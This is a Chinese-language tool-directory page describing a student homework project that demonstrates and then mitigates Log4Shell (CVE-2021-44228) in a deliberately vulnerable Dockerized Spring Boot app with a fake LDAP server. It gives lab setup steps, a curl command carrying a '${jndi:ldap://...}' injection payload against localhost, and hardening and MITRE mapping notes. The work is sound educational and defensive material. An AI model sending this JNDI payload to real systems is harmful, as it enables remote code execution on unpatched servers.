Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4shell-homework9 — Log4Shell (CVE-2021-44228) 针对 SEAS 8405 的利用演示。包含一个易受攻击的 Spring Boot 应用、伪造的 LDAP 服务器、Docker 配置、MITRE 映射、应急响应以及完整的屏幕录像。 | Kitploit
工具/GitHubGitHub/serpilrivas/log4shell-homework9
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育事件响应实验室与实践
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

Log4Shell (CVE-2021-44228) 针对 SEAS 8405 的利用演示。包含一个易受攻击的 Spring Boot 应用、伪造的 LDAP 服务器、Docker 配置、MITRE 映射、应急响应以及完整的屏幕录像。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

作业 9 – 保护系统免受 Log4Shell 漏洞攻击

概述

本项目演示了 Log4Shell 漏洞(CVE-2021-44228)的利用与缓解,使用了一个包含易受攻击的 Log4j 2.14.1 的 Dockerized Java Web 应用。该设置还包含一个模拟的恶意 LDAP 服务器,用于演示 JNDI 注入攻击路径。

在利用之后,系统通过升级 Log4j、验证输入以及应用 MITRE D3FEND 和 ATT&CK 建议进行了加固。


文件夹结构

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

如何运行

1. 构建 Java 应用(包含有漏洞的 Log4j)

root@kitploit:~
docker build -t vulnerable-app .

2. 使用 Docker Compose 运行应用

root@kitploit:~
docker-compose up

应用将在以下地址运行:
http://localhost:8080

3. 启动虚假 LDAP 服务器(在新终端中)

root@kitploit:~
python3 ldap_server.py

4. 模拟一次攻击

向应用发送如下请求:

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

LDAP 服务器应收到该请求(这模拟了 JNDI 攻击)。


如何加固

在演示攻击之后,通过以下方式对系统进行了安全加固:

  • 将 Log4j 升级至 2.17.0 版本
  • 输入验证(拦截 ${jndi:...} 模式)
  • 在配置中禁用消息查找
  • Docker 隔离以限制影响范围
  • 应用 MITRE D3FEND 和 ATT&CK 技术

MITRE 映射

MITRE ATT&CK:

  • T1190: 利用面向公众的应用程序
  • T1210: 利用远程服务

MITRE D3FEND:

  • D3-IA: 输入验证
  • D3-HI: 基于主机的入侵检测
  • D3-DA: 禁用不安全功能

报告

详见 mitigation_report.pdf:

  • 系统架构(加固前后)
  • Log4Shell 漏洞说明
  • 缓解策略
  • 事件响应计划

屏幕录制

如果视频未直接上传,可在报告中的链接处获取。


作者

Serpil Rivas
SEAS 8405 – 网络安全架构
2025 年 5 月

下载工具